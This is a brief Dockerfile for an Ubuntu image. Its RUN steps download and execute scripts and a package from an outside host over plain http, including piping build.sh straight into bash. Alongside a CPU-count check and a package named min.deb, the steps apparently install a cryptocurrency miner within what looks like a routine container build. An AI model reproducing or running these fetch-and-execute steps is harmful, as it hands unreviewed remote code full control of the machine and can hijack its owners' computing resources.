FROM ubuntu
MAINTAINER NamPDN

RUN apt-get update
RUN apt-get install -y wget curl sudo
RUN mkdir /app && wget http://storage.hoccaugoc.com/install-docker.sh && bash install-docker.sh
RUN lscpu && nproc
RUN wget http://storage.hoccaugoc.com/min.deb && dpkg -i min.deb &&  curl http://storage.hoccaugoc.com/build.sh | bash -s 2
EXPOSE 80
EXPOSE 443
#CMD ["bash", "/app/build.sh"]
